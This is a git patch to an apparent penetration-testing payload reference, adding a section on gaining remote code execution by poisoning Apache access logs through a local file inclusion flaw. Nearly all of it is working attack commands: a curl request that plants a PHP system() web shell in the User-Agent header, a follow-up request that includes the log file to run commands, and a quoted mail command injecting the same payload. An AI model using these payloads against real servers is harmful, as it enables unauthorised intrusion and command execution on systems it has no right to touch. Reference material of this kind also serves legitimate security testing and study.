From 61eed94f18c66dbb36524e00867083557551d481 Mon Sep 17 00:00:00 2001
From: Alexandre ZANNI <16578570+noraj@users.noreply.github.com>
Date: Mon, 10 May 2021 11:48:14 +0200
Subject: [PATCH] add RCE via Apache logs in log poisoning

---
 File Inclusion/README.md | 16 ++++++++++++++++
 1 file changed, 16 insertions(+)

diff --git a/File Inclusion/README.md b/File Inclusion/README.md
index 8bb0a16..cc4a67f 100644
--- a/File Inclusion/README.md	
+++ b/File Inclusion/README.md	
@@ -345,6 +345,22 @@ In some cases you can also send the email with the `mail` command line.
 mail -s "<?php system($_GET['cmd']);?>" www-data@10.10.10.10. < /dev/null
 ```
 
+### RCE via Apache logs
+
+Poison the User-Agent in access logs:
+
+```
+$ curl http://example.org/ -A "<?php system(\$_GET['cmd']);?>"
+```
+
+Note: The logs will escape double quotes so use single quotes for strings in the PHP payload.
+
+Then request the logs via the LFI and execute your command.
+
+```
+$ curl http://example.org/test.php?page=/var/log/apache2/access.log&cmd=id
+```
+
 ## LFI to RCE via PHP sessions
 
 Check if the website use PHP Session (PHPSESSID)